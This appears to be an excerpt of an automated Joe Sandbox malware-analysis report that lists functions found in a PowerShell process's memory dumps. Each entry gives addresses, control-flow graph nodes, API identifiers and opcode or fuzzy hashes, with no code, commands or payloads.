                                                                                                                                        • Source File: 00000007.00000002.23033692188.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_8f80000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ThreadToken
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3254676861-0
                                                                                                                                        • Opcode ID: e6a64c8a8c48597df21a8531fa4462ef4473ae709a72b179e017758d1ffcb922
                                                                                                                                        • Instruction ID: 2bf50c68e3f1aed681c79f6ef10f7d78e8a2f9400769910bbe9337a17411af90
                                                                                                                                        • Opcode Fuzzy Hash: e6a64c8a8c48597df21a8531fa4462ef4473ae709a72b179e017758d1ffcb922
                                                                                                                                        • Instruction Fuzzy Hash: 901116B1A006488FDB10CFA9D884BDEFBF4EB89324F24841AD459A7350C774A944CFA5
                                                                                                                                        Function 08F80A08 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 642 8f80a08-8f80a77 SetThreadToken 644 8f80a79-8f80a7f 642->644 645 8f80a80-8f80a9d 642->645 644->645
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23033692188.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_8f80000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ThreadToken
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3254676861-0
                                                                                                                                        • Opcode ID: 29ba848327d779c4bc9e6725f72a3095cde38dc9306cbeec996472068ddb5f64
                                                                                                                                        • Instruction ID: e44aaab82c5d1a7240aaf8405c004d618b3646ac2963d84a5e7f0991175570b8
                                                                                                                                        • Opcode Fuzzy Hash: 29ba848327d779c4bc9e6725f72a3095cde38dc9306cbeec996472068ddb5f64
                                                                                                                                        • Instruction Fuzzy Hash: 0311F5B1A007488FDB10DF9AC885BDEFBF8EB88224F24841AD459A7310D774A944CFA5
                                                                                                                                        Function 06CCA5B0 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 648 6cca5b0-6cca5b7 649 6cca5be-6cca5c2 648->649 650 6cca5b9 call 6cc9cbc 648->650 651 6cca5c4-6cca5d1 649->651 652 6cca5d2-6cca66d 649->652 650->649 658 6cca66f-6cca675 652->658 659 6cca676-6cca693 652->659 658->659
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (&\r
                                                                                                                                        • API String ID: 0-3490144471
                                                                                                                                        • Opcode ID: 26a5337a7f7362f9f93221f0c1ff9f3d1a81c9a1607d9cd12861d0e281a39425
                                                                                                                                        • Instruction ID: 0de343a9b00831927f6353255521d3f64a4338a5705914cc0d0425262c73c665
                                                                                                                                        • Opcode Fuzzy Hash: 26a5337a7f7362f9f93221f0c1ff9f3d1a81c9a1607d9cd12861d0e281a39425
                                                                                                                                        • Instruction Fuzzy Hash: 9421AE71E042488FDB10DBADD8447DEBBF5EB89320F14842ED409E7340CA749944CBE5
                                                                                                                                        Function 06CCE1F8 Relevance: .2, Instructions: 173COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 892 6cce1f8-6cce2ee call 6ccb2f8 call 6ccd590 903 6cce305-6cce30d 892->903 904 6cce2f0-6cce2fa call 6cc9cb0 892->904 906 6cce30f 903->906 907 6cce313-6cce321 903->907 904->903 913 6cce2fc-6cce2fe 904->913 906->907 909 6cce327-6cce335 907->909 910 6cce323 907->910 911 6cce33b-6cce39e call 6ccb2f8 * 3 909->911 912 6cce337 909->912 910->909 924 6cce3a4 911->924 925 6cce3a0-6cce3a2 911->925 912->911 913->903 926 6cce3a7-6cce3bf 924->926 925->926 939 6cce3c2 call 6ccecb8 926->939 940 6cce3c2 call 6cceca7 926->940 927 6cce3c8-6cce459 939->927 940->927
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4620d5275a714d30e1c4284bcd9e4a40c142270f7a379b41ff66baf5a873f97f
                                                                                                                                        • Instruction ID: f04c3987b16f6dcc53d1d80210e2d1ad086396dc43dfec9ca09bf87ce093c9ad
                                                                                                                                        • Opcode Fuzzy Hash: 4620d5275a714d30e1c4284bcd9e4a40c142270f7a379b41ff66baf5a873f97f
                                                                                                                                        • Instruction Fuzzy Hash: BD713331E002599FDB51DFA9C8946DDBBF2BF89310F14826DE409AB351EB30A985CF91
                                                                                                                                        Function 06CCE208 Relevance: .2, Instructions: 164COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 941 6cce208-6cce2ee call 6ccb2f8 call 6ccd590 952 6cce305-6cce30d 941->952 953 6cce2f0-6cce2fa call 6cc9cb0 941->953 955 6cce30f 952->955 956 6cce313-6cce321 952->956 953->952 962 6cce2fc-6cce2fe 953->962 955->956 958 6cce327-6cce335 956->958 959 6cce323 956->959 960 6cce33b-6cce39e call 6ccb2f8 * 3 958->960 961 6cce337 958->961 959->958 973 6cce3a4 960->973 974 6cce3a0-6cce3a2 960->974 961->960 962->952 975 6cce3a7-6cce3bf 973->975 974->975 988 6cce3c2 call 6ccecb8 975->988 989 6cce3c2 call 6cceca7 975->989 976 6cce3c8-6cce459 988->976 989->976
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4dd25b1f0cc87e1430bef88ab53c5dbeeff01e8a5956ec7f3293d0c8c99475b3
                                                                                                                                        • Instruction ID: ede2aab816ef39ad5708d83a6a291af040bc4e8c8279c99492274e4329c6e482
                                                                                                                                        • Opcode Fuzzy Hash: 4dd25b1f0cc87e1430bef88ab53c5dbeeff01e8a5956ec7f3293d0c8c99475b3
                                                                                                                                        • Instruction Fuzzy Hash: 5F610231E002199FDB54DFA9C89469DBBF2FF89310F14816ED819AB351EB30A985CF91
                                                                                                                                        Function 06CCB0D8 Relevance: .2, Instructions: 155COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 990 6ccb0d8-6ccb168 994 6ccb16e-6ccb179 990->994 995 6ccb16a 990->995 996 6ccb17e-6ccb1d8 call 6cca5b0 994->996 997 6ccb17b 994->997 995->994 1004 6ccb229-6ccb22d 996->1004 1005 6ccb1da-6ccb1df 996->1005 997->996 1006 6ccb23e 1004->1006 1007 6ccb22f-6ccb239 1004->1007 1005->1004 1008 6ccb1e1-6ccb204 1005->1008 1009 6ccb243-6ccb245 1006->1009 1007->1006 1012 6ccb20a-6ccb215 1008->1012 1010 6ccb26a 1009->1010 1011 6ccb247-6ccb268 1009->1011 1015 6ccb272-6ccb276 1010->1015 1016 6ccb26d call 6cc9cb0 1010->1016 1011->1015 1013 6ccb21e-6ccb227 1012->1013 1014 6ccb217-6ccb21d 1012->1014 1013->1009 1014->1013 1018 6ccb2af-6ccb2de 1015->1018 1019 6ccb278-6ccb2a1 1015->1019 1016->1015 1019->1018
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4d74437768fb07132afa395fb95304b1ed67aa63b0855a764bfcf4bda32e95d3
                                                                                                                                        • Instruction ID: a6e3f8f9a47b22eaecb6977eda03b693e6a0bc217b547c3c4084df8ea9544b08
                                                                                                                                        • Opcode Fuzzy Hash: 4d74437768fb07132afa395fb95304b1ed67aa63b0855a764bfcf4bda32e95d3
                                                                                                                                        • Instruction Fuzzy Hash: 5F61F671E01208DFDB54DFA9D99979DBBF1EF88320F14812AE809AB354DB30AD41CB61
                                                                                                                                        Function 06CCB0C9 Relevance: .2, Instructions: 151COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1029 6ccb0c9-6ccb168 1033 6ccb16e-6ccb179 1029->1033 1034 6ccb16a 1029->1034 1035 6ccb17e-6ccb1d8 call 6cca5b0 1033->1035 1036 6ccb17b 1033->1036 1034->1033 1043 6ccb229-6ccb22d 1035->1043 1044 6ccb1da-6ccb1df 1035->1044 1036->1035 1045 6ccb23e 1043->1045 1046 6ccb22f-6ccb239 1043->1046 1044->1043 1047 6ccb1e1-6ccb204 1044->1047 1048 6ccb243-6ccb245 1045->1048 1046->1045 1051 6ccb20a-6ccb215 1047->1051 1049 6ccb26a 1048->1049 1050 6ccb247-6ccb268 1048->1050 1054 6ccb272-6ccb276 1049->1054 1055 6ccb26d call 6cc9cb0 1049->1055 1050->1054 1052 6ccb21e-6ccb227 1051->1052 1053 6ccb217-6ccb21d 1051->1053 1052->1048 1053->1052 1057 6ccb2af-6ccb2de 1054->1057 1058 6ccb278-6ccb2a1 1054->1058 1055->1054 1058->1057
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 1ca39cc8f485cc905db297ba7b19ddcab7e3bdf5735151110b9a8f4e8dda6656
                                                                                                                                        • Instruction ID: b85bdc1cf427f5bbd36cead47ab642ad7d6fb4fef30a0027dffd718a68744bc8
                                                                                                                                        • Opcode Fuzzy Hash: 1ca39cc8f485cc905db297ba7b19ddcab7e3bdf5735151110b9a8f4e8dda6656
                                                                                                                                        • Instruction Fuzzy Hash: BA512871E01248DFDB54DFA9D99969DBBF1EF88320F14802EE809AB355DB30AD41CB61
                                                                                                                                        Function 077D3CCD Relevance: .1, Instructions: 123COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1204 77d3ccd-77d3d0d 1206 77d3f00-77d3f16 1204->1206 1207 77d3d13-77d3d18 1204->1207 1217 77d3f1f-77d3f4a 1206->1217 1218 77d3f18-77d3f1e 1206->1218 1208 77d3d1a-77d3d20 1207->1208 1209 77d3d30-77d3d34 1207->1209 1213 77d3d24-77d3d2e 1208->1213 1214 77d3d22 1208->1214 1210 77d3d3a-77d3d3c 1209->1210 1211 77d3eb0-77d3eba 1209->1211 1215 77d3d4c 1210->1215 1216 77d3d3e-77d3d4a 1210->1216 1219 77d3ebc-77d3ec5 1211->1219 1220 77d3ec8-77d3ece 1211->1220 1213->1209 1214->1209 1221 77d3d4e-77d3d50 1215->1221 1216->1221 1222 77d40ce-77d40de 1217->1222 1223 77d3f50-77d3f55 1217->1223 1218->1217 1224 77d3ed4-77d3ee0 1220->1224 1225 77d3ed0-77d3ed2 1220->1225 1221->1211 1228 77d3d56-77d3d75 1221->1228 1237 77d40e7-77d4112 1222->1237 1238 77d40e0-77d40e6 1222->1238 1229 77d3f6d-77d3f71 1223->1229 1230 77d3f57-77d3f5d 1223->1230 1227 77d3ee2-77d3efd 1224->1227 1225->1227 1260 77d3d85 1228->1260 1261 77d3d77-77d3d83 1228->1261 1233 77d3f77-77d3f79 1229->1233 1234 77d4080-77d408a 1229->1234 1235 77d3f5f 1230->1235 1236 77d3f61-77d3f6b 1230->1236 1240 77d3f89 1233->1240 1241 77d3f7b-77d3f87 1233->1241 1242 77d408c-77d4094 1234->1242 1243 77d4097-77d409d 1234->1243 1235->1229 1236->1229 1246 77d4228-77d425d 1237->1246 1247 77d4118-77d411d 1237->1247 1238->1237 1248 77d3f8b-77d3f8d 1240->1248 1241->1248 1249 77d409f-77d40a1 1243->1249 1250 77d40a3-77d40af 1243->1250 1270 77d425f-77d4281 1246->1270 1271 77d428b-77d4295 1246->1271 1251 77d411f-77d4125 1247->1251 1252 77d4135-77d4139 1247->1252 1248->1234 1254 77d3f93-77d3fb2 1248->1254 1255 77d40b1-77d40cb 1249->1255 1250->1255 1257 77d4129-77d4133 1251->1257 1258 77d4127 1251->1258 1262 77d413f-77d4141 1252->1262 1263 77d41da-77d41e4 1252->1263 1293 77d3fb4-77d3fc0 1254->1293 1294 77d3fc2 1254->1294 1257->1252 1258->1252 1266 77d3d87-77d3d89 1260->1266 1261->1266 1267 77d4151 1262->1267 1268 77d4143-77d414f 1262->1268 1272 77d41e6-77d41ee 1263->1272 1273 77d41f1-77d41f7 1263->1273 1266->1211 1279 77d3d8f-77d3d96 1266->1279 1280 77d4153-77d4155 1267->1280 1268->1280 1308 77d42d5-77d42fe 1270->1308 1309 77d4283-77d4288 1270->1309 1276 77d429f-77d42a5 1271->1276 1277 77d4297-77d429c 1271->1277 1274 77d41fd-77d4209 1273->1274 1275 77d41f9-77d41fb 1273->1275 1282 77d420b-77d4225 1274->1282 1275->1282 1283 77d42ab-77d42b7 1276->1283 1284 77d42a7-77d42a9 1276->1284 1279->1206 1286 77d3d9c-77d3da1 1279->1286 1280->1263 1281 77d415b-77d415d 1280->1281 1289 77d415f-77d4165 1281->1289 1290 77d4177-77d417e 1281->1290 1292 77d42b9-77d42d2 1283->1292 1284->1292 1295 77d3db9-77d3dc8 1286->1295 1296 77d3da3-77d3da9 1286->1296 1300 77d4169-77d4175 1289->1300 1301 77d4167 1289->1301 1302 77d4196-77d41d7 1290->1302 1303 77d4180-77d4186 1290->1303 1306 77d3fc4-77d3fc6 1293->1306 1294->1306 1295->1211 1317 77d3dce-77d3dec 1295->1317 1297 77d3dad-77d3db7 1296->1297 1298 77d3dab 1296->1298 1297->1295 1298->1295 1300->1290 1301->1290 1311 77d4188 1303->1311 1312 77d418a-77d4194 1303->1312 1306->1234 1307 77d3fcc-77d4003 1306->1307 1332 77d401d-77d4024 1307->1332 1333 77d4005-77d400b 1307->1333 1326 77d432d-77d433e 1308->1326 1327 77d4300-77d4326 1308->1327 1311->1302 1312->1302 1317->1211 1330 77d3df2-77d3e17 1317->1330 1339 77d4347-77d435c 1326->1339 1340 77d4340-77d4346 1326->1340 1327->1326 1330->1211 1354 77d3e1d-77d3e24 1330->1354 1337 77d403c-77d407d 1332->1337 1338 77d4026-77d402c 1332->1338 1335 77d400d 1333->1335 1336 77d400f-77d401b 1333->1336 1335->1332 1336->1332 1344 77d402e 1338->1344 1345 77d4030-77d403a 1338->1345 1346 77d435e-77d437b 1339->1346 1347 77d4395-77d439f 1339->1347 1340->1339 1344->1337 1345->1337 1357 77d437d-77d438f 1346->1357 1358 77d43e5-77d43ea 1346->1358 1349 77d43a8-77d43ae 1347->1349 1350 77d43a1-77d43a5 1347->1350 1355 77d43b4-77d43c0 1349->1355 1356 77d43b0-77d43b2 1349->1356 1359 77d3e6a-77d3e9d 1354->1359 1360 77d3e26-77d3e41 1354->1360 1361 77d43c2-77d43e2 1355->1361 1356->1361 1357->1347 1358->1357 1376 77d3ea4-77d3ead 1359->1376 1367 77d3e5b-77d3e5f 1360->1367 1368 77d3e43-77d3e49 1360->1368 1373 77d3e66-77d3e68 1367->1373 1370 77d3e4d-77d3e59 1368->1370 1371 77d3e4b 1368->1371 1370->1367 1371->1367 1373->1376
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23027755201.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_77d0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 304320f6f1936259991467b433d96c8be152ed68a20d20a5951fd1cfdaeb219e
                                                                                                                                        • Instruction ID: 0d3504fbb3d06eac22a1ebefeb9745f75d479733ab4801941fcdbdae2f1ed024
                                                                                                                                        • Opcode Fuzzy Hash: 304320f6f1936259991467b433d96c8be152ed68a20d20a5951fd1cfdaeb219e
                                                                                                                                        • Instruction Fuzzy Hash: D441FDF1A00241DFDB258F58C5506BA7BF29F89690F1989AAD8049F292C731DC45CBA3
                                                                                                                                        Function 06CCAE18 Relevance: .1, Instructions: 100COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e2c3d592f86132e19cdd953c7931fc75f604903fbfb4d88c91c47bdec24f70da
                                                                                                                                        • Instruction ID: 100a20c32979bb35a94076c10fbf8211ed93be8e42f2890a50a9969f601ddc2f
                                                                                                                                        • Opcode Fuzzy Hash: e2c3d592f86132e19cdd953c7931fc75f604903fbfb4d88c91c47bdec24f70da
                                                                                                                                        • Instruction Fuzzy Hash: 17410A72A00209AFDF419FD9CC44AEEBFB6FF48314F144419E615A7220C7369961DFA1
                                                                                                                                        Function 06CCFA80 Relevance: .1, Instructions: 94COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 33fcc134069ee3c5818c8ff282f0fabf06184f93eb0fadee9df09acb3d296e36
                                                                                                                                        • Instruction ID: 1ff35eeaf064ffe9e13080c8870b9e918156b1f4fcc38f6835fc9ea3bcb33b1d
                                                                                                                                        • Opcode Fuzzy Hash: 33fcc134069ee3c5818c8ff282f0fabf06184f93eb0fadee9df09acb3d296e36
                                                                                                                                        • Instruction Fuzzy Hash: 9841F771D007589FEB54CF9AC9A4A9DBBF6FF48320F24812ED818AB214D734A944CF90
                                                                                                                                        Function 06CCFA70 Relevance: .1, Instructions: 93COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f9438e2296ecd512b1ba286050a870a5a31ec2f275ea60b5c04d07f307b06730
                                                                                                                                        • Instruction ID: 1570debb35e5beb0a5cd7178cf6e4705cbe731bd4571f6847896e67fdd905a5e
                                                                                                                                        • Opcode Fuzzy Hash: f9438e2296ecd512b1ba286050a870a5a31ec2f275ea60b5c04d07f307b06730
                                                                                                                                        • Instruction Fuzzy Hash: 03410771D003589FEB50DFA9C9A4A9DFBB6FF48310F24816ED418AB254D730A945CF90
                                                                                                                                        Function 06CCA477 Relevance: .1, Instructions: 90COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: fe3bfb42fa9ca6071da3dea3a50d4050fae8fba1fdb3b5c5a9abd9d86769e990
                                                                                                                                        • Instruction ID: 779686c82d1c00098f42bd2389577819dc0b518d1de6f7e0497e7602436ef807
                                                                                                                                        • Opcode Fuzzy Hash: fe3bfb42fa9ca6071da3dea3a50d4050fae8fba1fdb3b5c5a9abd9d86769e990
                                                                                                                                        • Instruction Fuzzy Hash: 46315C30E012099FDB85EFB9D4587AEBBF2AF89310F14806DD405EB354EB748841CB91
                                                                                                                                        Function 06CCA488 Relevance: .1, Instructions: 84COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 092f30947284fbdfe24a3db7ae849606197567ba47649d4e2e01657fd2a6e9f4
                                                                                                                                        • Instruction ID: 568108d41b1589ccff377bf5256d6a28c20e57ef2452cf9d0f812141e33b87bd
                                                                                                                                        • Opcode Fuzzy Hash: 092f30947284fbdfe24a3db7ae849606197567ba47649d4e2e01657fd2a6e9f4
                                                                                                                                        • Instruction Fuzzy Hash: D7314B70E002099FDB84EFA9D4587AEBAF6AF89321F14802DE405EB354EB748C418B90
                                                                                                                                        Function 06CCEE4D Relevance: .1, Instructions: 84COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2a48f1bac0841543a5c8e4b8018f6a007ea19b93d86d117c00cc2568840e7349
                                                                                                                                        • Instruction ID: f1361135423992b28e68eedfa4775a80746dffee360324a0e93b7872a31c3d5b
                                                                                                                                        • Opcode Fuzzy Hash: 2a48f1bac0841543a5c8e4b8018f6a007ea19b93d86d117c00cc2568840e7349
                                                                                                                                        • Instruction Fuzzy Hash: 3F315E71E00209CFEB94DFAAD945BEEBBF1AF49324F14842CD005B7290DB749945CB90
                                                                                                                                        Function 06CCA340 Relevance: .1, Instructions: 83COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2a2c3cd87dcd21192bdc0fc33ec197c6a022195274ed710da6dddec0903c39c3
                                                                                                                                        • Instruction ID: 97d9e3227d32aba578471e88e9354261fdff6f8a628b7ae21d231cb1191299cd
                                                                                                                                        • Opcode Fuzzy Hash: 2a2c3cd87dcd21192bdc0fc33ec197c6a022195274ed710da6dddec0903c39c3
                                                                                                                                        • Instruction Fuzzy Hash: F431A1B4A002049FEB44EFB8D498AFE7BB2EF84300F1084ADD515AB391DA39AD01CF51
                                                                                                                                        Function 06CCF6C0 Relevance: .1, Instructions: 81COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2f0c7a8b1f038538a397695541eabf52b519677ad039bbccb215d30b34b895bd
                                                                                                                                        • Instruction ID: 5932b07813f5b04638c1a026518b0e5a0faa2c560931acba57e122c83d22b0a0
                                                                                                                                        • Opcode Fuzzy Hash: 2f0c7a8b1f038538a397695541eabf52b519677ad039bbccb215d30b34b895bd
                                                                                                                                        • Instruction Fuzzy Hash: 8F316E30E012089FDB44DFA8D994BEEBBF2AF48324F14406DE405AB391DB319D01CB90
                                                                                                                                        Function 06CCECB8 Relevance: .1, Instructions: 81COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c991e3b0325eb8df3ede7630b445cd389550ee9b98ccec7500d99d7efbcc0e49
                                                                                                                                        • Instruction ID: 23ea6131ece6b3d9e6d3974aa5db2c33319a73c3ee2580ce83f6d18f5b7ea120
                                                                                                                                        • Opcode Fuzzy Hash: c991e3b0325eb8df3ede7630b445cd389550ee9b98ccec7500d99d7efbcc0e49
                                                                                                                                        • Instruction Fuzzy Hash: 2C316D71900749DFEB60CF99C885BEEBFB4EF99724F24810DE9146B280C375A594CBA1
                                                                                                                                        Function 06CCF6D0 Relevance: .1, Instructions: 78COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4a0619ab1b4c206268fa706675cb2cf0584f79926da0964b0097336caeb247a7
                                                                                                                                        • Instruction ID: 6824b527e0c955e5b47998d3b5f35803074910c6ac9199cf79471668a44b8098
                                                                                                                                        • Opcode Fuzzy Hash: 4a0619ab1b4c206268fa706675cb2cf0584f79926da0964b0097336caeb247a7
                                                                                                                                        • Instruction Fuzzy Hash: 30316D30E012089FDB44DFA8D595BAEBBF2EF88320F14802DE405A7395DA359D01CBA0
                                                                                                                                        Function 06CCA350 Relevance: .1, Instructions: 77COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 335d908f4a6465be7483006bdd093ac976749f003170f350a8d89032cc55c819
                                                                                                                                        • Instruction ID: 01328a158117016adb58e37b3d4f2b3fc6ae7ed8324e2fd79f13b213feb0fac6
